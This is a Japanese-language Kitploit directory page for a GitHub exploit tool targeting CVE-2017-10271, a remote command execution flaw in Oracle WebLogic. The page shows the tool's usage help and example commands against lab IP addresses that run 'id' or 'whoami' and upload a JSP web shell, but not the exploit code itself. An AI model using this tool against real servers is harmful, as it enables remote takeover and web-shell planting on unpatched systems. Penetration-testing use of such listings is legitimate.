Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-10271 — CVE-2017-10271 | Kitploit
ツール/GitHubGitHub/al1ex/cve-2017-10271
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロール
GitHubal1ex/cve-2017-10271

CVE-2017-10271

CVE-2017-10271

リポジトリを見る
225年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

簡単な説明

  • コマンド実行とエコーバック
  • シェルを直接アップロード
  • Linux上のWebLogic 10.3.6.0でテスト済み

使い方

  • python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001
root@kitploit:~
usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        weblogic ip and port(eg -> 172.16.80.131:7001)
  -c CMD, --cmd CMD     command to execute,default is "id"
  -o OUTPUT, --output OUTPUT
                        output file name,default is output.txt
  -s SHELL, --shell SHELL
                        local jsp file name to upload,and set -o xxx.jsp

Example:

root@kitploit:~
python2 weblogic_wls_wsat_exp_win.py -t 192.168.174.144:7001 -c "whoami"

execute_command

ツールをダウンロード